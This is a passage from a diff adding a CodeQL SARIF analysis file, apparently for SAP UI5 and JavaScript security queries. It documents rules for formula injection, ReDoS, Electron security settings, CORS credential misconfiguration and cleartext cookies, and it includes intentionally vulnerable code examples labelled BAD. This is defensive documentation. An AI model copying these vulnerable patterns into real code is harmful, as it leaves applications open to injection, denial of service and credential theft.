[`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet) is the preferred method of achieving the same exporting functionality.\n\n## Example\n\nThe following controller is exporting a CSV file obtained from an event parameter by surrounding it in a pair of semicolons (`;`) as CSV separators.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/Controller\",\n \"sap/ui/core/util/File\"\n ], function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSomeEvent: function(oEvent) {\n let response = oEvent.getProperty(\"someProperty\").someField;\n let csvRow = \";\" + response + \";\";\n File.save(csvRow, \"someFile\", \"csv\", \"text/csv\", \"utf-8\");\n }\n });\n });\n```\n\n## References\n\n- OWASP: [CSV Injection](https://owasp.org/www-community/attacks/CSV_Injection).\n- Common Weakness Enumeration: [CWE-1236](https://cwe.mitre.org/data/definitions/1236.html).\n- SAP UI5 API Reference: [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet).\n- SAP UI5 API Reference: [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-1236" ], + "description" : "Saving data from an uncontrolled remote source using filesystem or local storage\n leads to disclosure of sensitive information or forgery of entry.", + "id" : "js/ui5-formula-injection", + "kind" : "path-problem", + "name" : "UI5 Formula Injection", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "7.8" + } + } ], + "locations" : [ { + "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/ui5/src/", + "description" : { + "text" : "The QL pack root directory." + } + }, { + "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/ui5/src/qlpack.yml", + "description" : { + "text" : "The QL pack definition file." + } + } ] + }, { + "name" : "codeql/javascript-queries", + "semanticVersion" : "0.8.1+8e890571ed7b21bc10698c5dbd032b9ed551d8f1", + "notifications" : [ { + "id" : "js/diagnostics/extraction-errors", + "name" : "js/diagnostics/extraction-errors", + "shortDescription" : { + "text" : "Extraction errors" + }, + "fullDescription" : { + "text" : "List all extraction errors for files in the source code directory." + }, + "defaultConfiguration" : { + "enabled" : true + }, + "properties" : { + "description" : "List all extraction errors for files in the source code directory.", + "id" : "js/diagnostics/extraction-errors", + "kind" : "diagnostic", + "name" : "Extraction errors" + } + }, { + "id" : "js/diagnostics/successfully-extracted-files", + "name" : "js/diagnostics/successfully-extracted-files", + "shortDescription" : { + "text" : "Successfully extracted files" + }, + "fullDescription" : { + "text" : "Lists all files in the source code directory that were extracted without encountering an error in the file." + }, + "defaultConfiguration" : { + "enabled" : true + }, + "properties" : { + "tags" : [ "successfully-extracted-files" ], + "description" : "Lists all files in the source code directory that were extracted without encountering an error in the file.", + "id" : "js/diagnostics/successfully-extracted-files", + "kind" : "diagnostic", + "name" : "Successfully extracted files" + } + } ], + "rules" : [ { + "id" : "js/polynomial-redos", + "name" : "js/polynomial-redos", + "shortDescription" : { + "text" : "Polynomial regular expression used on uncontrolled data" + }, + "fullDescription" : { + "text" : "A regular expression that can require polynomial time to match may be vulnerable to denial-of-service attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Polynomial regular expression used on uncontrolled data\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this use of a regular expression, which removes all leading and trailing whitespace in a string:\n\n```javascript\n\ntext.replace(/^\\s+|\\s+$/g, ''); // BAD\n```\nThe sub-expression `\"\\s+$\"` will match the whitespace characters in `text` from left to right, but it can start matching anywhere within a whitespace sequence. This is problematic for strings that do **not** end with a whitespace character. Such a string will force the regular expression engine to process each whitespace sequence once per whitespace character in the sequence.\n\nThis ultimately means that the time cost of trimming a string is quadratic in the length of the string. So a string like `\"a b\"` will take milliseconds to process, but a similar string with a million spaces instead of just one will take several minutes.\n\nAvoid this problem by rewriting the regular expression to not contain the ambiguity about when to start matching whitespace sequences. For instance, by using a negative look-behind (`/^\\s+|(? 1000) {\n throw new Error(\"Input too long\");\n}\n\n/^(\\+|-)?(\\d+|(\\d*\\.\\d*))?(E|e)?([-+])?(\\d+)?$/.test(str)\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](http://www.cs.bham.ac.uk/~hxt/research/reg-exp-sec.pdf).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", + "markdown" : "# Polynomial regular expression used on uncontrolled data\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this use of a regular expression, which removes all leading and trailing whitespace in a string:\n\n```javascript\n\ntext.replace(/^\\s+|\\s+$/g, ''); // BAD\n```\nThe sub-expression `\"\\s+$\"` will match the whitespace characters in `text` from left to right, but it can start matching anywhere within a whitespace sequence. This is problematic for strings that do **not** end with a whitespace character. Such a string will force the regular expression engine to process each whitespace sequence once per whitespace character in the sequence.\n\nThis ultimately means that the time cost of trimming a string is quadratic in the length of the string. So a string like `\"a b\"` will take milliseconds to process, but a similar string with a million spaces instead of just one will take several minutes.\n\nAvoid this problem by rewriting the regular expression to not contain the ambiguity about when to start matching whitespace sequences. For instance, by using a negative look-behind (`/^\\s+|(? 1000) {\n throw new Error(\"Input too long\");\n}\n\n/^(\\+|-)?(\\d+|(\\d*\\.\\d*))?(E|e)?([-+])?(\\d+)?$/.test(str)\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](http://www.cs.bham.ac.uk/~hxt/research/reg-exp-sec.pdf).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-1333", "external/cwe/cwe-730", "external/cwe/cwe-400" ], + "description" : "A regular expression that can require polynomial time\n to match may be vulnerable to denial-of-service attacks.", + "id" : "js/polynomial-redos", + "kind" : "path-problem", + "name" : "Polynomial regular expression used on uncontrolled data", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/redos", + "name" : "js/redos", + "shortDescription" : { + "text" : "Inefficient regular expression" + }, + "fullDescription" : { + "text" : "A regular expression that requires exponential time to match certain inputs can be a performance bottleneck, and may be vulnerable to denial-of-service attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Inefficient regular expression\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this regular expression:\n\n```javascript\n\n/^_(__|.)+_$/\n```\nIts sub-expression `\"(__|.)+?\"` can match the string `\"__\"` either by the first alternative `\"__\"` to the left of the `\"|\"` operator, or by two repetitions of the second alternative `\".\"` to the right. Thus, a string consisting of an odd number of underscores followed by some other character will cause the regular expression engine to run for an exponential amount of time before rejecting the input.\n\nThis problem can be avoided by rewriting the regular expression to remove the ambiguity between the two branches of the alternative inside the repetition:\n\n```javascript\n\n/^_(__|[^_])+_$/\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](http://www.cs.bham.ac.uk/~hxt/research/reg-exp-sec.pdf).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", + "markdown" : "# Inefficient regular expression\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this regular expression:\n\n```javascript\n\n/^_(__|.)+_$/\n```\nIts sub-expression `\"(__|.)+?\"` can match the string `\"__\"` either by the first alternative `\"__\"` to the left of the `\"|\"` operator, or by two repetitions of the second alternative `\".\"` to the right. Thus, a string consisting of an odd number of underscores followed by some other character will cause the regular expression engine to run for an exponential amount of time before rejecting the input.\n\nThis problem can be avoided by rewriting the regular expression to remove the ambiguity between the two branches of the alternative inside the repetition:\n\n```javascript\n\n/^_(__|[^_])+_$/\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](http://www.cs.bham.ac.uk/~hxt/research/reg-exp-sec.pdf).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-1333", "external/cwe/cwe-730", "external/cwe/cwe-400" ], + "description" : "A regular expression that requires exponential time to match certain inputs\n can be a performance bottleneck, and may be vulnerable to denial-of-service\n attacks.", + "id" : "js/redos", + "kind" : "problem", + "name" : "Inefficient regular expression", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.5" + } + }, { + "id" : "js/disabling-electron-websecurity", + "name" : "js/disabling-electron-websecurity", + "shortDescription" : { + "text" : "Disabling Electron webSecurity" + }, + "fullDescription" : { + "text" : "Disabling webSecurity can cause critical security vulnerabilities." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Disabling Electron webSecurity\nElectron is secure by default through a same-origin policy requiring all JavaScript and CSS code to originate from the machine running the Electron application. Setting the `webSecurity` property of a `webPreferences` object to `false` will disable the same-origin policy.\n\nDisabling the same-origin policy is strongly discouraged.\n\n\n## Recommendation\nDo not disable `webSecurity`.\n\n\n## Example\nThe following example shows `webSecurity` being disabled.\n\n\n```javascript\nconst mainWindow = new BrowserWindow({\n webPreferences: {\n webSecurity: false\n }\n})\n```\nThis is problematic, since it allows the execution of insecure code from other domains.\n\n\n## References\n* Electron Documentation: [Security, Native Capabilities, and Your Responsibility](https://electronjs.org/docs/tutorial/security#5-do-not-disable-websecurity)\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n", + "markdown" : "# Disabling Electron webSecurity\nElectron is secure by default through a same-origin policy requiring all JavaScript and CSS code to originate from the machine running the Electron application. Setting the `webSecurity` property of a `webPreferences` object to `false` will disable the same-origin policy.\n\nDisabling the same-origin policy is strongly discouraged.\n\n\n## Recommendation\nDo not disable `webSecurity`.\n\n\n## Example\nThe following example shows `webSecurity` being disabled.\n\n\n```javascript\nconst mainWindow = new BrowserWindow({\n webPreferences: {\n webSecurity: false\n }\n})\n```\nThis is problematic, since it allows the execution of insecure code from other domains.\n\n\n## References\n* Electron Documentation: [Security, Native Capabilities, and Your Responsibility](https://electronjs.org/docs/tutorial/security#5-do-not-disable-websecurity)\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n" + }, + "properties" : { + "tags" : [ "security", "frameworks/electron", "external/cwe/cwe-79" ], + "description" : "Disabling webSecurity can cause critical security vulnerabilities.", + "id" : "js/disabling-electron-websecurity", + "kind" : "problem", + "name" : "Disabling Electron webSecurity", + "precision" : "very-high", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/enabling-electron-insecure-content", + "name" : "js/enabling-electron-insecure-content", + "shortDescription" : { + "text" : "Enabling Electron allowRunningInsecureContent" + }, + "fullDescription" : { + "text" : "Enabling allowRunningInsecureContent can allow remote code execution." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Enabling Electron allowRunningInsecureContent\nElectron is secure by default through a policy banning the execution of content loaded over HTTP. Setting the `allowRunningInsecureContent` property of a `webPreferences` object to `true` will disable this policy.\n\nEnabling the execution of insecure content is strongly discouraged.\n\n\n## Recommendation\nDo not enable the `allowRunningInsecureContent` property.\n\n\n## Example\nThe following example shows `allowRunningInsecureContent` being enabled.\n\n\n```javascript\nconst mainWindow = new BrowserWindow({\n webPreferences: {\n allowRunningInsecureContent: true\n }\n})\n```\nThis is problematic, since it allows the execution of code from an untrusted origin.\n\n\n## References\n* Electron Documentation: [Security, Native Capabilities, and Your Responsibility](https://electronjs.org/docs/tutorial/security#8-do-not-set-allowrunninginsecurecontent-to-true)\n* Common Weakness Enumeration: [CWE-494](https://cwe.mitre.org/data/definitions/494.html).\n", + "markdown" : "# Enabling Electron allowRunningInsecureContent\nElectron is secure by default through a policy banning the execution of content loaded over HTTP. Setting the `allowRunningInsecureContent` property of a `webPreferences` object to `true` will disable this policy.\n\nEnabling the execution of insecure content is strongly discouraged.\n\n\n## Recommendation\nDo not enable the `allowRunningInsecureContent` property.\n\n\n## Example\nThe following example shows `allowRunningInsecureContent` being enabled.\n\n\n```javascript\nconst mainWindow = new BrowserWindow({\n webPreferences: {\n allowRunningInsecureContent: true\n }\n})\n```\nThis is problematic, since it allows the execution of code from an untrusted origin.\n\n\n## References\n* Electron Documentation: [Security, Native Capabilities, and Your Responsibility](https://electronjs.org/docs/tutorial/security#8-do-not-set-allowrunninginsecurecontent-to-true)\n* Common Weakness Enumeration: [CWE-494](https://cwe.mitre.org/data/definitions/494.html).\n" + }, + "properties" : { + "tags" : [ "security", "frameworks/electron", "external/cwe/cwe-494" ], + "description" : "Enabling allowRunningInsecureContent can allow remote code execution.", + "id" : "js/enabling-electron-insecure-content", + "kind" : "problem", + "name" : "Enabling Electron allowRunningInsecureContent", + "precision" : "very-high", + "problem.severity" : "error", + "security-severity" : "8.8" + } + }, { + "id" : "js/cors-misconfiguration-for-credentials", + "name" : "js/cors-misconfiguration-for-credentials", + "shortDescription" : { + "text" : "CORS misconfiguration for credentials transfer" + }, + "fullDescription" : { + "text" : "Misconfiguration of CORS HTTP headers allows for leaks of secret credentials." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# CORS misconfiguration for credentials transfer\nA server can send the `\"Access-Control-Allow-Credentials\"` CORS header to control when a browser may send user credentials in Cross-Origin HTTP requests.\n\nWhen the `Access-Control-Allow-Credentials` header is `\"true\"`, the `Access-Control-Allow-Origin` header must have a value different from `\"*\"` in order to make browsers accept the header. Therefore, to allow multiple origins for Cross-Origin requests with credentials, the server must dynamically compute the value of the `\"Access-Control-Allow-Origin\"` header. Computing this header value from information in the request to the server can therefore potentially allow an attacker to control the origins that the browser sends credentials to.\n\n\n## Recommendation\nWhen the `Access-Control-Allow-Credentials` header value is `\"true\"`, a dynamic computation of the `Access-Control-Allow-Origin` header must involve sanitization if it relies on user-controlled input.\n\nSince the `\"null\"` origin is easy to obtain for an attacker, it is never safe to use `\"null\"` as the value of the `Access-Control-Allow-Origin` header when the `Access-Control-Allow-Credentials` header value is `\"true\"`.\n\n\n## Example\nIn the example below, the server allows the browser to send user credentials in a Cross-Origin request. The request header `origins` controls the allowed origins for such a Cross-Origin request.\n\n\n```javascript\nvar https = require('https'),\n url = require('url');\n\nvar server = https.createServer(function(){});\n\nserver.on('request', function(req, res) {\n let origin = url.parse(req.url, true).query.origin;\n // BAD: attacker can choose the value of origin\n res.setHeader(\"Access-Control-Allow-Origin\", origin);\n res.setHeader(\"Access-Control-Allow-Credentials\", true);\n\n // ...\n});\n\n```\nThis is not secure, since an attacker can choose the value of the `origin` request header to make the browser send credentials to their own server. The use of a whitelist containing allowed origins for the Cross-Origin request fixes the issue:\n\n\n```javascript\nvar https = require('https'),\n url = require('url');\n\nvar server = https.createServer(function(){});\n\nserver.on('request', function(req, res) {\n let origin = url.parse(req.url, true).query.origin,\n whitelist = {\n \"https://example.com\": true,\n \"https://subdomain.example.com\": true,\n \"https://example.com:1337\": true\n };\n\n if (origin in whitelist) {\n // GOOD: the origin is in the whitelist\n res.setHeader(\"Access-Control-Allow-Origin\", origin);\n res.setHeader(\"Access-Control-Allow-Credentials\", true);\n }\n\n // ...\n});\n\n```\n\n## References\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Origin](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Origin).\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Credentials](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Credentials).\n* PortSwigger: [Exploiting CORS Misconfigurations for Bitcoins and Bounties](http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html)\n* W3C: [CORS for developers, Advice for Resource Owners](https://w3c.github.io/webappsec-cors-for-developers/#resources)\n* Common Weakness Enumeration: [CWE-346](https://cwe.mitre.org/data/definitions/346.html).\n* Common Weakness Enumeration: [CWE-639](https://cwe.mitre.org/data/definitions/639.html).\n* Common Weakness Enumeration: [CWE-942](https://cwe.mitre.org/data/definitions/942.html).\n", + "markdown" : "# CORS misconfiguration for credentials transfer\nA server can send the `\"Access-Control-Allow-Credentials\"` CORS header to control when a browser may send user credentials in Cross-Origin HTTP requests.\n\nWhen the `Access-Control-Allow-Credentials` header is `\"true\"`, the `Access-Control-Allow-Origin` header must have a value different from `\"*\"` in order to make browsers accept the header. Therefore, to allow multiple origins for Cross-Origin requests with credentials, the server must dynamically compute the value of the `\"Access-Control-Allow-Origin\"` header. Computing this header value from information in the request to the server can therefore potentially allow an attacker to control the origins that the browser sends credentials to.\n\n\n## Recommendation\nWhen the `Access-Control-Allow-Credentials` header value is `\"true\"`, a dynamic computation of the `Access-Control-Allow-Origin` header must involve sanitization if it relies on user-controlled input.\n\nSince the `\"null\"` origin is easy to obtain for an attacker, it is never safe to use `\"null\"` as the value of the `Access-Control-Allow-Origin` header when the `Access-Control-Allow-Credentials` header value is `\"true\"`.\n\n\n## Example\nIn the example below, the server allows the browser to send user credentials in a Cross-Origin request. The request header `origins` controls the allowed origins for such a Cross-Origin request.\n\n\n```javascript\nvar https = require('https'),\n url = require('url');\n\nvar server = https.createServer(function(){});\n\nserver.on('request', function(req, res) {\n let origin = url.parse(req.url, true).query.origin;\n // BAD: attacker can choose the value of origin\n res.setHeader(\"Access-Control-Allow-Origin\", origin);\n res.setHeader(\"Access-Control-Allow-Credentials\", true);\n\n // ...\n});\n\n```\nThis is not secure, since an attacker can choose the value of the `origin` request header to make the browser send credentials to their own server. The use of a whitelist containing allowed origins for the Cross-Origin request fixes the issue:\n\n\n```javascript\nvar https = require('https'),\n url = require('url');\n\nvar server = https.createServer(function(){});\n\nserver.on('request', function(req, res) {\n let origin = url.parse(req.url, true).query.origin,\n whitelist = {\n \"https://example.com\": true,\n \"https://subdomain.example.com\": true,\n \"https://example.com:1337\": true\n };\n\n if (origin in whitelist) {\n // GOOD: the origin is in the whitelist\n res.setHeader(\"Access-Control-Allow-Origin\", origin);\n res.setHeader(\"Access-Control-Allow-Credentials\", true);\n }\n\n // ...\n});\n\n```\n\n## References\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Origin](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Origin).\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Credentials](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Credentials).\n* PortSwigger: [Exploiting CORS Misconfigurations for Bitcoins and Bounties](http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html)\n* W3C: [CORS for developers, Advice for Resource Owners](https://w3c.github.io/webappsec-cors-for-developers/#resources)\n* Common Weakness Enumeration: [CWE-346](https://cwe.mitre.org/data/definitions/346.html).\n* Common Weakness Enumeration: [CWE-639](https://cwe.mitre.org/data/definitions/639.html).\n* Common Weakness Enumeration: [CWE-942](https://cwe.mitre.org/data/definitions/942.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-346", "external/cwe/cwe-639", "external/cwe/cwe-942" ], + "description" : "Misconfiguration of CORS HTTP headers allows for leaks of secret credentials.", + "id" : "js/cors-misconfiguration-for-credentials", + "kind" : "path-problem", + "name" : "CORS misconfiguration for credentials transfer", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.5" + } + }, { + "id" : "js/functionality-from-untrusted-source", + "name" : "js/functionality-from-untrusted-source", + "shortDescription" : { + "text" : "Inclusion of functionality from an untrusted source" + }, + "fullDescription" : { + "text" : "Including functionality from an untrusted source may allow an attacker to control the functionality and execute arbitrary code." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Inclusion of functionality from an untrusted source\nIncluding a resource from an untrusted source or using an untrusted channel may allow an attacker to include arbitrary code in the response. When including an external resource (for example, a `script` element or an `iframe` element) on a page, it is important to ensure that the received data is not malicious.\n\nWhen including external resources, it is possible to verify that the responding server is the intended one by using an `https` URL. This prevents a MITM (man-in-the-middle) attack where an attacker might have been able to spoof a server response.\n\nEven when `https` is used, an attacker might still compromise the server. When you use a `script` element, you can check for subresource integrity - that is, you can check the contents of the data received by supplying a cryptographic digest of the expected sources to the `script` element. The script will only load sources that match the digest and an attacker will be unable to modify the script even when the server is compromised.\n\nSubresource integrity checking is commonly recommended when importing a fixed version of a library - for example, from a CDN (content-delivery network). Then, the fixed digest of that version of the library can easily be added to the `script` element's `integrity` attribute.\n\n\n## Recommendation\nWhen an `iframe` element is used to embed a page, it is important to use an `https` URL.\n\nWhen using a `script` element to load a script, it is important to use an `https` URL and to consider checking subresource integrity.\n\n\n## Example\nThe following example loads the jQuery library from the jQuery CDN without using `https` and without checking subresource integrity.\n\n\n```html\n\n \n jQuery demo\n \n \n \n ...\n \n\n```\nInstead, loading jQuery from the same domain using `https` and checking subresource integrity is recommended, as in the next example.\n\n\n```html\n\n \n jQuery demo\n \n \n \n ...\n \n\n```\n\n## References\n* MDN: [Subresource Integrity](https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity)\n* Smashing Magazine: [Understanding Subresource Integrity](https://www.smashingmagazine.com/2019/04/understanding-subresource-integrity/)\n* Common Weakness Enumeration: [CWE-830](https://cwe.mitre.org/data/definitions/830.html).\n", + "markdown" : "# Inclusion of functionality from an untrusted source\nIncluding a resource from an untrusted source or using an untrusted channel may allow an attacker to include arbitrary code in the response. When including an external resource (for example, a `script` element or an `iframe` element) on a page, it is important to ensure that the received data is not malicious.\n\nWhen including external resources, it is possible to verify that the responding server is the intended one by using an `https` URL. This prevents a MITM (man-in-the-middle) attack where an attacker might have been able to spoof a server response.\n\nEven when `https` is used, an attacker might still compromise the server. When you use a `script` element, you can check for subresource integrity - that is, you can check the contents of the data received by supplying a cryptographic digest of the expected sources to the `script` element. The script will only load sources that match the digest and an attacker will be unable to modify the script even when the server is compromised.\n\nSubresource integrity checking is commonly recommended when importing a fixed version of a library - for example, from a CDN (content-delivery network). Then, the fixed digest of that version of the library can easily be added to the `script` element's `integrity` attribute.\n\n\n## Recommendation\nWhen an `iframe` element is used to embed a page, it is important to use an `https` URL.\n\nWhen using a `script` element to load a script, it is important to use an `https` URL and to consider checking subresource integrity.\n\n\n## Example\nThe following example loads the jQuery library from the jQuery CDN without using `https` and without checking subresource integrity.\n\n\n```html\n\n \n jQuery demo\n \n \n \n ...\n \n\n```\nInstead, loading jQuery from the same domain using `https` and checking subresource integrity is recommended, as in the next example.\n\n\n```html\n\n \n jQuery demo\n \n \n \n ...\n \n\n```\n\n## References\n* MDN: [Subresource Integrity](https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity)\n* Smashing Magazine: [Understanding Subresource Integrity](https://www.smashingmagazine.com/2019/04/understanding-subresource-integrity/)\n* Common Weakness Enumeration: [CWE-830](https://cwe.mitre.org/data/definitions/830.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-830" ], + "description" : "Including functionality from an untrusted source may allow\n an attacker to control the functionality and execute arbitrary code.", + "id" : "js/functionality-from-untrusted-source", + "kind" : "problem", + "name" : "Inclusion of functionality from an untrusted source", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "6.0" + } + }, { + "id" : "js/clear-text-cookie", + "name" : "js/clear-text-cookie", + "shortDescription" : { + "text" : "Clear text transmission of sensitive cookie" + }, + "fullDescription" : { + "text" : "Sending sensitive information in a cookie without requring SSL encryption can expose the cookie to an attacker." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Clear text transmission of sensitive cookie\nCookies that are transmitted in clear text can be intercepted by an attacker. If sensitive cookies are intercepted, the attacker can read the cookie and use it to perform actions on the user's behalf.\n\n\n## Recommendation\nAlways transmit sensitive cookies using SSL by setting the `secure` attribute on the cookie.\n\n\n## Example\nThe following example stores an authentication token in a cookie that can be transmitted in clear text.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

